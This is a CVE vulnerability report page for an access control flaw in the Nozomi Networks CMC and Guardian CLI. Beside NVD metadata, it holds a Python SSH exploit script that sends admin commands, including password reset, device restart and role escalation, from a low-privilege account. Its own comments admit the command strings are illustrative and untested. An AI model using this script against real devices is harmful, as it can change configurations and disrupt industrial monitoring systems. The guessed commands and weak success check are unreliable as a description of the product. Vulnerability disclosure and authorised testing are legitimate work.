Security Vulnerability Report
CVE-2025-3719 CVSS 8.1 HIGH

CVE-2025-3719

Published: 2025-10-07 13:15:34
Last Modified: 2025-10-09 16:38:45

Description

An access control vulnerability was discovered in the CLI functionality due to a specific access restriction not being properly enforced for users with limited privileges. An authenticated user with limited privileges can issue administrative CLI commands, altering the device configuration, and/or affecting its availability.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:nozominetworks:cmc:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:nozominetworks:guardian:*:*:*:*:*:*:*:* - VULNERABLE
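Nozomi Networks products. The NVD configuration data in the Raw JSON Data section marks CMC and Guardian versions before 25.2.0 as vulnerable; see vendor advisory NN-2025:5-01 for the exact affected versions.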

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
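# CVE-2025-3719 PoC - CLI Access Control Bypass
# This PoC demonstrates the access control vulnerability in Nozomi Networks CLI
#
# NOTE(review): the description reproduced on this page only states that
# "administrative CLI commands" are reachable by a limited-privilege user; it
# does not name them. The command strings below are illustrative and have not
# been checked against the product's CLI or the vendor advisory.
import sys
import time

import paramiko


def exploit_cli_access_control(target_host, port, username, password):
    """
    Exploit CVE-2025-3719: CLI Access Control Bypass
    Authenticated low-privilege user can execute admin CLI commands

    Args:
        target_host: Host name or address of the device's SSH service.
        port: TCP port of the SSH service.
        username: Login name of the limited-privilege account.
        password: Password for that account.

    Returns:
        True when the SSH session was established and every command was sent,
        whatever the per-command verdict was; False on authentication failure
        or any other exception. The return value is NOT a vulnerable/patched
        verdict -- that is only printed per command.
    """
    client = paramiko.SSHClient()
    try:
        # Step 1: Establish SSH connection with low-privilege credentials
        # NOTE(review): AutoAddPolicy accepts any host key without checking
        # it, so the credentials are sent to an unauthenticated peer. Pin the
        # expected host key where one is known.
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

        print(f"[*] Connecting to {target_host}:{port} as user '{username}'...")
        client.connect(
            hostname=target_host,
            port=port,
            username=username,
            password=password,
            timeout=10
        )
        print("[+] Authentication successful with low-privilege account")

        # Step 2: Invoke interactive shell
        shell = client.invoke_shell()

        # Step 3: Execute admin-level CLI commands (should be restricted)
        # Several entries (password reset, restart, role change) alter device
        # state or availability if they are accepted, so a run of this script
        # is not a read-only check.
        admin_commands = [
            "show running-config",        # View full configuration
            "configure terminal",         # Enter global config mode
            "admin password reset",       # Reset admin password
            "system restart",             # Restart the device
            "user admin role superuser",  # Modify user roles
        ]

        for cmd in admin_commands:
            print(f"\n[*] Executing admin command: {cmd}")
            shell.send(cmd + "\n")

            # Fixed wait for the device to answer; a slow device may return
            # partial output within this window.
            time.sleep(1)

            output = shell.recv(65535).decode('utf-8', errors='ignore')
            print(f"[+] Output:\n{output}")

            # Check if command was executed (vulnerability indicator)
            # NOTE(review): the absence of "error"/"denied" is a weak signal.
            # Empty output, an echoed prompt, or a rejection worded
            # differently (e.g. "unknown command") is reported as VULNERABLE.
            # Confirm against the rejection text the product actually emits
            # before relying on this verdict.
            lowered = output.lower()
            if "error" not in lowered and "denied" not in lowered:
                print(f"[!] VULNERABLE: Command '{cmd}' executed without proper authorization!")
            else:
                print(f"[-] Command '{cmd}' was denied (not vulnerable or patched)")

        return True

    except paramiko.AuthenticationException:
        print("[-] Authentication failed - valid credentials required")
        return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False
    finally:
        # Release the transport on every path; the original only closed the
        # client when the whole command loop completed without an exception.
        client.close()


if __name__ == "__main__":
    if len(sys.argv) != 5:
        print(f"Usage: {sys.argv[0]} <target_host> <port> <username> <password>")
        print(f"Example: {sys.argv[0]} 192.168.1.100 22 limiteduser password123")
        sys.exit(1)

    # NOTE(review): a password passed on the command line is visible in the
    # process list and shell history on the machine running the script.
    target = sys.argv[1]
    try:
        port = int(sys.argv[2])
    except ValueError:
        # A non-numeric port previously surfaced as an uncaught traceback.
        print(f"[-] Invalid port: {sys.argv[2]!r}")
        sys.exit(1)
    user = sys.argv[3]
    pwd = sys.argv[4]

    exploit_cli_access_control(target, port, user, pwd)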

References

- https://security.nozominetworks.com/NN-2025:5-01 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-3719", "sourceIdentifier": "[email protected]", "published": "2025-10-07T13:15:33.880", "lastModified": "2025-10-09T16:38:45.200", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An access control vulnerability was discovered in the CLI functionality due to a specific access restriction not being properly enforced for users with limited privileges. An authenticated user with limited privileges can issue administrative CLI commands, altering the device configuration, and/or affecting its availability."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": 
"NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nozominetworks:cmc:*:*:*:*:*:*:*:*", "versionEndExcluding": "25.2.0", "matchCriteriaId": "6EE8E12E-EBAC-4B34-9D31-F68195E1F5CF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nozominetworks:guardian:*:*:*:*:*:*:*:*", "versionEndExcluding": "25.2.0", "matchCriteriaId": "81AC5154-CA70-4917-8B33-D7AD5B57C683"}]}]}], "references": [{"url": "https://security.nozominetworks.com/NN-2025:5-01", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}